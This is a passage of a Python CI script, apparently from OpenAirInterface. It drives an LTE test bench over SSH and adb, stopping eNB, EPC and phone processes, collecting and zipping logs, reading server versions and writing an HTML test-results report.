self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, pcap_log_file, self.eNBSourceCodePath + '/cmake_targets/.')
self.close()
logging.debug('\u001B[1m Replaying RAW record file\u001B[0m')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/common/utils/T/tracer/', '\$', 5)
raw_record_file = self.eNBLogFile.replace('.log', '_record.raw')
replay_log_file = self.eNBLogFile.replace('.log', '_replay.log')
extracted_txt_file = self.eNBLogFile.replace('.log', '_extracted_messages.txt')
extracted_log_file = self.eNBLogFile.replace('.log', '_extracted_messages.log')
self.command('./extract_config -i ' + self.eNBSourceCodePath + '/cmake_targets/' + raw_record_file + ' > ' + self.eNBSourceCodePath + '/cmake_targets/' + extracted_txt_file, '\$', 5)
self.command('echo $USER; nohup ./replay -i ' + self.eNBSourceCodePath + '/cmake_targets/' + raw_record_file + ' > ' + self.eNBSourceCodePath + '/cmake_targets/' + replay_log_file + ' 2>&1 &', self.eNBUserName, 5)
self.command('./textlog -d ' + self.eNBSourceCodePath + '/cmake_targets/' + extracted_txt_file + ' -no-gui -ON -full > ' + self.eNBSourceCodePath + '/cmake_targets/' + extracted_log_file, '\$', 5)
self.close()
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + extracted_log_file, '.')
logging.debug('\u001B[1m Analyzing eNB replay logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(extracted_log_file)
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFile = ''
else:
result = re.search('enb_', str(self.eNBLogFile))
if result is not None:
copyin_res = self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy eNB logfile to analyze it! \u001B[0m')
self.htmleNBFailureMsg = 'Could not copy eNB logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', ENB_PROCESS_NOLOGFILE_TO_ANALYZE)
self.eNBLogFile = ''
return
logging.debug('\u001B[1m Analyzing eNB logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFile)
if (logStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', logStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFile = ''
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_hss oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep hss', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_hss oai_hss || true', '\$', 5)
else:
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ./kill_hss.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=simulated_hss --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL hss_sim', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_mme mme || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep mme', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_mme mme || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_spgw spgw || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep -v grep | grep spgw', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_spgw spgw || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target= SSH.TerminateUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
self.testCase_id = 'AUTO-KILL-eNB'
self.desc = 'Automatic Termination of eNB'
self.ShowTestID()
self.eNB_instance = '0'
self.TerminateeNB()
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
self.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', ALL_PROCESSES_OK)
def LogCollectBuild(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('rm -f build.log.zip', '\$', 5)
self.command('zip build.log.zip build_log_*/*', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -rf build_log_*', '\$', 5)
self.close()
def LogCollecteNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -f enb.log.zip', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S zip enb.log.zip enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 5)
self.close()
def LogCollectPing(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ping.log.zip', '\$', 5)
self.command('zip ping.log.zip ping*.log', '\$', 60)
self.command('rm ping*.log', '\$', 5)
self.close()
def LogCollectIperf(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f iperf.log.zip', '\$', 5)
self.command('zip iperf.log.zip iperf*.log', '\$', 60)
self.command('rm iperf*.log', '\$', 5)
self.close()
def LogCollectHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f hss.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip hss*.log', '\$', 60)
self.command('rm hss*.log', '\$', 5)
else:
self.command('cp /opt/hss_sim0609/hss.log .', '\$', 60)
self.command('zip hss.log.zip hss.log', '\$', 60)
self.close()
def LogCollectMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f mme.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip mme.log.zip mme*.log', '\$', 60)
self.command('rm mme*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/*Log.0 .', '\$', 5)
self.command('zip mme.log.zip mmeLog.0 s1apcLog.0 s1apsLog.0 s11cLog.0 libLog.0 s1apCodecLog.0', '\$', 60)
self.close()
def LogCollectSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f spgw.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip spgw.log.zip spgw*.log', '\$', 60)
self.command('rm spgw*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/xGwLog.0 .', '\$', 5)
self.command('zip spgw.log.zip xGwLog.0', '\$', 60)
self.close()
def RetrieveSystemVersion(self):
if self.eNBIPAddress == 'none':
self.eNBOsVersion = 'Ubuntu 16.04.5 LTS'
self.eNBKernelVersion = '4.15.0-45-generic'
self.eNBUhdVersion = '3.13.0.1-0'
self.eNBUsrpBoard = 'B210'
self.eNBCpuNb = '4'
self.eNBCpuModel = 'Intel(R) Core(TM) i5-6200U'
self.eNBCpuMHz = '2399.996 MHz'
return
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', str(self.ssh.before))
if result is not None:
self.eNBOsVersion = result.group('os_type')
logging.debug('OS is: ' + self.eNBOsVersion)
self.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', str(self.ssh.before))
if result is not None:
self.eNBKernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + self.eNBKernelVersion)
self.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.eNBUhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + self.eNBUhdVersion)
self.command('echo ' + self.eNBPassword + ' | sudo -S uhd_find_devices', '\$', 5)
result = re.search('product: (?P<usrp_board>[0-9A-Za-z]+)\\\\r\\\\n', str(self.ssh.before))
if result is not None:
self.eNBUsrpBoard = result.group('usrp_board')
logging.debug('USRP Board is: ' + self.eNBUsrpBoard)
self.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.eNBCpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + self.eNBCpuNb)
self.eNBCpuModel = result.group('model')
logging.debug('model: ' + self.eNBCpuModel)
self.eNBCpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + self.eNBCpuMHz)
self.close()
#-----------------------------------------------------------
# HTML Reporting....
#-----------------------------------------------------------
def CreateHtmlHeader(self):
if (not self.htmlHeaderCreated):
self.htmlFile = open('test_results.html', 'w')
self.htmlFile.write('<!DOCTYPE html>\n')
self.htmlFile.write('<html class="no-js" lang="en-US">\n')
self.htmlFile.write('<head>\n')
self.htmlFile.write(' <meta name="viewport" content="width=device-width, initial-scale=1">\n')
self.htmlFile.write(' <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">\n')
self.htmlFile.write(' <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\n')
self.htmlFile.write(' <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>\n')
self.htmlFile.write(' <title>Test Results for TEMPLATE_JOB_NAME job build #TEMPLATE_BUILD_ID</title>\n')
self.htmlFile.write('</head>\n')
self.htmlFile.write('<body><div class="container">\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <table style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <tr style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <a href="http://www.openairinterface.org/">\n')
self.htmlFile.write(' <img src="http://www.openairinterface.org/wp-content/uploads/2016/03/cropped-oai_final_logo2.png" alt="" border="none" height=50 width=150>\n')
self.htmlFile.write(' </img>\n')
self.htmlFile.write(' </a>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none; vertical-align: center;">\n')
self.htmlFile.write(' <b><font size = "6">Job Summary -- Job: TEMPLATE_JOB_NAME -- Build-ID: TEMPLATE_BUILD_ID</font></b>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <div class="alert alert-info"><strong> <span class="glyphicon glyphicon-dashboard"></span> TEMPLATE_STAGE_NAME</strong></div>\n')
self.htmlFile.write(' <table border = "1">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-time"></span> Build Start Time (UTC) </td>\n')
self.htmlFile.write(' <td>TEMPLATE_BUILD_TIME</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-cloud-upload"></span> GIT Repository </td>\n')
self.htmlFile.write(' <td><a href="' + self.eNBRepository + '">' + self.eNBRepository + '</a></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-wrench"></span> Job Trigger </td>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td>Merge-Request</td>\n')
else:
self.htmlFile.write(' <td>Push to Branch</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-out"></span> Source Branch </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tree-deciduous"></span> Branch</td>\n')
self.htmlFile.write(' <td>' + self.eNBBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Source Commit ID </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Commit ID </td>\n')
self.htmlFile.write(' <td>' + self.eNBCommitID + '</td>\n')
self.htmlFile.write(' </tr>\n')
if self.eNB_AllowMerge != '':
commit_message = subprocess.check_output("git log -n1 --pretty=format:\"%s\" " + self.eNBCommitID, shell=True, universal_newlines=True)
commit_message = commit_message.strip()
self.htmlFile.write(' <tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Source Commit Message </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Commit Message </td>\n')
self.htmlFile.write(' <td>' + commit_message + '</td>\n')
self.htmlFile.write(' </tr>\n')
if (self.eNB_AllowMerge):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-in"></span> Target Branch </td>\n')
if (self.eNBTargetBranch == ''):
self.htmlFile.write(' <td>develop</td>\n')
else:
self.htmlFile.write(' <td>' + self.eNBTargetBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('doughq9rehg')
self.UEDevices.append('dnsgiuahgia')
self.UEDevices.append('uehgieng9')
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' UE(s) is(are) connected to ADB bench server</h2>\n')
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.CatMDevices)) + ' CAT-M UE(s) is(are) connected to bench server</h2>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <ul class="nav nav-pills">\n')
count = 0
while (count < self.nbTestXMLfiles):
pillMsg = ' <li><a data-toggle="pill" href="#'
pillMsg += self.htmlTabRefs[count]
pillMsg += '">'
pillMsg += self.htmlTabNames[count]
pillMsg += ' <span class="glyphicon glyphicon-'
pillMsg += self.htmlTabIcons[count]
pillMsg += '"></span></a></li>\n'
self.htmlFile.write(pillMsg)
count += 1
self.htmlFile.write(' </ul>\n')
self.htmlFile.write(' <div class="tab-content">\n')
self.htmlFile.close()
def CreateHtmlTabHeader(self):
if (not self.htmlHeaderCreated):
if (not os.path.isfile('test_results.html')):
self.CreateHtmlHeader()
self.htmlFile = open('test_results.html', 'a')
if (self.nbTestXMLfiles == 1):
self.htmlFile.write(' <div id="' + self.htmlTabRefs[0] + '" class="tab-pane fade">\n')
self.htmlFile.write(' <h3>Test Summary for <span class="glyphicon glyphicon-file"></span> ' + self.testXMLfiles[0] + '</h3>\n')
else:
self.htmlFile.write(' <div id="build-tab" class="tab-pane fade">\n')
self.htmlFile.write(' <table class="table" border = "1">\n')
self.htmlFile.write(' <tr bgcolor = "#33CCFF" >\n')
self.htmlFile.write(' <th>Test Id</th>\n')
self.htmlFile.write(' <th>Test Desc</th>\n')
self.htmlFile.write(' <th>Test Options</th>\n')
self.htmlFile.write(' <th>Test Status</th>\n')
if (self.htmlUEConnected == -1):
terminate_ue_flag = True
if (self.ADBIPAddress != 'none'):
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
else:
self.UEDevices.append('doughq9rehg')
self.UEDevices.append('dnsgiuahgia')
self.UEDevices.append('uehgieng9')
self.htmlUEConnected = len(self.UEDevices)
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <th>UE' + str(i) + ' Status</th>\n')
i += 1
self.htmlFile.write(' </tr>\n')
self.htmlHeaderCreated = True
def CreateHtmlTabFooter(self, passStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th bgcolor = "#33CCFF" colspan=2>Final Tab Status</th>\n')
if passStatus:
self.htmlFile.write(' <th bgcolor = "green" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">PASS <span class="glyphicon glyphicon-ok"></span> </font></th>\n')
else:
self.htmlFile.write(' <th bgcolor = "red" colspan=' + str(2 + self.htmlUEConnected) + '><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' </div>\n')
self.htmlFooterCreated = False
def CreateHtmlFooter(self, passStatus):
if (os.path.isfile('test_results.html')):
self.RetrieveSystemVersion()
self.htmlFile = open('test_results.html', 'a')
self.htmlFile.write('</div>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <table class="table table-condensed">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=8>eNB Server Characteristics</th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>OS Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBOsVersion + '</span></td>\n')
self.htmlFile.write(' <td>Kernel Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBKernelVersion + '</span></td>\n')
self.htmlFile.write(' <td>UHD Version</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBUhdVersion + '</span></td>\n')
self.htmlFile.write(' <td>USRP Board</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBUsrpBoard + '</span></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td>Nb CPUs</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBCpuNb + '</span></td>\n')
self.htmlFile.write(' <td>CPU Model Name</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBCpuModel + '</span></td>\n')
self.htmlFile.write(' <td>CPU Frequency</td>\n')
self.htmlFile.write(' <td><span class="label label-default">' + self.eNBCpuMHz + '</span></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' <td></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <th colspan=5 bgcolor = "#33CCFF">Final Status</th>\n')
if passStatus:
self.htmlFile.write(' <th colspan=3 bgcolor="green"><font color="white">PASS <span class="glyphicon glyphicon-ok"></span></font></th>\n')
else:
self.htmlFile.write(' <th colspan=3 bgcolor="red"><font color="white">FAIL <span class="glyphicon glyphicon-remove"></span> </font></th>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <p></p>\n')
self.htmlFile.write(' <div class="well well-lg">End of Test Report -- Copyright <span class="glyphicon glyphicon-copyright-mark"></span> 2018 <a href="http://www.openairinterface.org/">OpenAirInterface</a>. All Rights Reserved.</div>\n')
self.htmlFile.write('</div></body>\n')
self.htmlFile.write('</html>\n')
self.htmlFile.close()
def CreateHtmlTestRow(self, options, status, processesStatus):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
if (processesStatus == 0):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
elif (processesStatus == ENB_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process not found</td>\n')
elif (processesStatus == ENB_PROCESS_SEG_FAULT):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process ended in Segmentation Fault</td>\n')
elif (processesStatus == ENB_PROCESS_ASSERTION):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process ended in Assertion</td>\n')
elif (processesStatus == ENB_PROCESS_REALTIME_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - eNB process faced Real Time issue(s)</td>\n')
elif (processesStatus == ENB_PROCESS_NOLOGFILE_TO_ANALYZE):
self.htmlFile.write(' <td bgcolor = "orange" >OK</td>\n')
elif (processesStatus == HSS_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - HSS process not found</td>\n')
elif (processesStatus == MME_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - MME process not found</td>\n')
elif (processesStatus == SPGW_PROCESS_FAILED):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - SPGW process not found</td>\n')
elif (processesStatus == UE_IP_ADDRESS_ISSUE):
self.htmlFile.write(' <td bgcolor = "lightcoral" >KO - Could not retrieve UE IP address</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
if (len(str(self.htmleNBFailureMsg)) > 2):
cellBgColor = 'white'
result = re.search('ended with|faced real time issues', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'red'
else:
result = re.search('showed|Reestablishment|Could not copy eNB logfile', self.htmleNBFailureMsg)
if result is not None:
cellBgColor = 'orange'
self.htmlFile.write(' <td bgcolor = "' + cellBgColor + '" colspan=' + str(self.htmlUEConnected) + '><pre style="background-color:' +
cellBgColor + '">' + self.htmleNBFailureMsg + '</pre></td>\n')
self.htmleNBFailureMsg = ''
else:
i = 0
while (i < self.htmlUEConnected):
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
def CreateHtmlTestRowQueue(self, options, status, ue_status, ue_queue):
if ((not self.htmlFooterCreated) and (self.htmlHeaderCreated)):
addOrangeBK = False
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" >' + self.testCase_id + '</td>\n')
self.htmlFile.write(' <td>' + self.desc + '</td>\n')
self.htmlFile.write(' <td>' + str(options) + '</td>\n')
if (str(status) == 'OK'):
self.htmlFile.write(' <td bgcolor = "lightgreen" >' + str(status) + '</td>\n')
elif (str(status) == 'KO'):
self.htmlFile.write(' <td bgcolor = "lightcoral" >' + str(status) + '</td>\n')
else:
addOrangeBK = True
self.htmlFile.write(' <td bgcolor = "orange" >' + str(status) + '</td>\n')
i = 0
while (i < self.htmlUEConnected):
if (i < ue_status):
if (not ue_queue.empty()):
if (addOrangeBK):
self.htmlFile.write(' <td bgcolor = "orange" >' + str(ue_queue.get()).replace('white', 'orange') + '</td>\n')
else:
self.htmlFile.write(' <td>' + str(ue_queue.get()) + '</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
else:
self.htmlFile.write(' <td>-</td>\n')
i += 1
self.htmlFile.write(' </tr>\n')
#-----------------------------------------------------------
# ShowTestID()
#-----------------------------------------------------------
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# Usage()
#-----------------------------------------------------------
def Usage():
print('------------------------------------------------------------')
print('main.py Ver:' + Version)
print('------------------------------------------------------------')
print('Usage: python main.py [options]')
print(' --help Show this help.')
print(' --mode=[Mode]')
print(' TesteNB')
print(' InitiateHtml, FinalizeHtml')
print(' TerminateeNB, TerminateUE, TerminateHSS, TerminateMME, TerminateSPGW')
print(' LogCollectBuild, LogCollecteNB, LogCollectHSS, LogCollectMME, LogCollectSPGW, LogCollectPing, LogCollectIperf')
print(' --eNBIPAddress=[eNB\'s IP Address]')
print(' --eNBRepository=[eNB\'s Repository URL]')
print(' --eNBBranch=[eNB\'s Branch Name]')
print(' --eNBCommitID=[eNB\'s Commit Number]')
print(' --eNB_AllowMerge=[eNB\'s Allow Merge Request (with target branch)]')
print(' --eNBTargetBranch=[eNB\'s Target Branch in case of a Merge Request]')
print(' --eNBUserName=[eNB\'s Login User Name]')
print(' --eNBPassword=[eNB\'s Login Password]')
print(' --eNBSourceCodePath=[eNB\'s Source Code Path]')
print(' --EPCIPAddress=[EPC\'s IP Address]')
print(' --EPCUserName=[EPC\'s Login User Name]')
print(' --EPCPassword=[EPC\'s Login Password]')
print(' --EPCSourceCodePath=[EPC\'s Source Code Path]')
print(' --EPCType=[EPC\'s Type: OAI or ltebox]')
print(' --ADBIPAddress=[ADB\'s IP Address]')
print(' --ADBUserName=[ADB\'s Login User Name]')
print(' --ADBPassword=[ADB\'s Login Password]')
print(' --XMLTestFile=[XML Test File to be run]')
print('------------------------------------------------------------')
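# Illustrative invocation (not taken from the repository): every value below is a
# placeholder -- the addresses, credentials, repository URL and file names are made up.
# It only shows how the options printed by Usage() combine for a TesteNB run:
#   python main.py --mode=TesteNB \
#     --eNBIPAddress=192.168.1.10 --eNBUserName=oaiuser --eNBPassword=oaipass \
#     --eNBRepository=https://example.org/oai/openairinterface5g.git \
#     --eNBBranch=develop --eNBCommitID=0123abcd \
#     --eNBSourceCodePath=/home/oaiuser/openairinterface5g \
#     --EPCIPAddress=192.168.1.11 --EPCUserName=epcuser --EPCPassword=epcpass \
#     --EPCSourceCodePath=/home/epcuser/openair-cn --EPCType=OAI \
#     --ADBIPAddress=192.168.1.12 --ADBUserName=adbuser --ADBPassword=adbpass \
#     --XMLTestFile=my_test_case_list.xml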
def CheckClassValidity(action,id):
